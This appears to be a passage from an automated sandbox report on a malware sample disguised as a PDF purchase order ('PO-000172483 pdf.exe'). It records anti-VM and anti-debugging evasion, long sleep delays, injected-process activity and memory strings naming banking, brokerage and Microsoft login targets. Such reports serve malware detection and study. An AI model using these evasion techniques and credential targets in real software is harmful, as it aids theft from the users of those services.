Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO-000172483 pdf.exe PID: 5980, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: 4530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: 4BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: 5BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: 5CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: 6CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: DF60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: EF60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: F3F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Memory allocated: 103F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Code function: 7_2_0178096E rdtsc

7_2_0178096E

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4601	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1360	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1885	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 931	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1036	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 500	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Window / User API: threadDelayed 3043	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Window / User API: threadDelayed 6929	Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\cttune.exe	API coverage: 3.1 %

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe TID: 1288	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe TID: 4220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5000	Thread sleep count: 1885 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5000	Thread sleep count: 931 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5000	Thread sleep count: 1036 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5000	Thread sleep count: 500 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe TID: 1600	Thread sleep count: 3043 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe TID: 1600	Thread sleep time: -6086000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe TID: 1600	Thread sleep count: 6929 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe TID: 1600	Thread sleep time: -13858000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe TID: 6524	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cttune.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cttune.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\cttune.exe

Code function: 11_2_00A8C870 FindFirstFileW,FindNextFileW,FindClose,

11_2_00A8C870

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: --cG1-69-.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ycnUEzgloE.exe, 0000000C.00000002.3289134315.000000000071F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: --cG1-69-.11.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: --cG1-69-.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: --cG1-69-.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: PO-000172483 pdf.exe, 00000000.00000002.2091437711.000000000902B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: --cG1-69-.11.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11w
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kofamerica.comVMware20,11696428655x
Source: --cG1-69-.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: --cG1-69-.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: --cG1-69-.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: --cG1-69-.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMwaree
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,1169642T
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: formVMware20,11696428655
Source: --cG1-69-.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rdVMware20,11696428655x
Source: --cG1-69-.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: --cG1-69-.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: --cG1-69-.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: --cG1-69-.11.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: --cG1-69-.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: cttune.exe, 0000000B.00000002.3288581704.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000D.00000002.2907003077.000001D35366B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: --cG1-69-.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: --cG1-69-.11.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: --cG1-69-.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: --cG1-69-.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: --cG1-69-.11.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,116964286
Source: --cG1-69-.11.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: PO-000172483 pdf.exe, 00000000.00000002.2072997076.00000000008FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: --cG1-69-.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: --cG1-69-.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: --cG1-69-.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: --cG1-69-.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: --cG1-69-.11.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: --cG1-69-.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: --cG1-69-.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: PO-000172483 pdf.exe, 00000000.00000002.2082693969.0000000003DD7000.00000004.00000800.00020000.00000000.sdmp, PO-000172483 pdf.exe, 00000000.00000002.2099185789.000000000C920000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: LYd0BQmWsIDIsqEMuqA
Source: --cG1-69-.11.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,11696428655t
Source: --cG1-69-.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: cttune.exe, 0000000B.00000002.3292470339.0000000008053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696428655}
Source: --cG1-69-.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Code function: 7_2_0178096E rdtsc

7_2_0178096E

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Code function: 7_2_00417EB3 LdrLoadDll,

7_2_00417EB3

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746154 mov eax, dword ptr fs:[00000030h]	7_2_01746154
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746154 mov eax, dword ptr fs:[00000030h]	7_2_01746154
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173C156 mov eax, dword ptr fs:[00000030h]	7_2_0173C156
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D8158 mov eax, dword ptr fs:[00000030h]	7_2_017D8158
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D4144 mov eax, dword ptr fs:[00000030h]	7_2_017D4144
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D4144 mov eax, dword ptr fs:[00000030h]	7_2_017D4144
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D4144 mov ecx, dword ptr fs:[00000030h]	7_2_017D4144
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D4144 mov eax, dword ptr fs:[00000030h]	7_2_017D4144
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D4144 mov eax, dword ptr fs:[00000030h]	7_2_017D4144
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018061C3 mov eax, dword ptr fs:[00000030h]	7_2_018061C3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018061C3 mov eax, dword ptr fs:[00000030h]	7_2_018061C3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01770124 mov eax, dword ptr fs:[00000030h]	7_2_01770124
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018161E5 mov eax, dword ptr fs:[00000030h]	7_2_018161E5
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EA118 mov ecx, dword ptr fs:[00000030h]	7_2_017EA118
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EA118 mov eax, dword ptr fs:[00000030h]	7_2_017EA118
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EA118 mov eax, dword ptr fs:[00000030h]	7_2_017EA118
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EA118 mov eax, dword ptr fs:[00000030h]	7_2_017EA118
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov eax, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov ecx, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov eax, dword ptr fs:[00000030h]	7_2_017EE10E
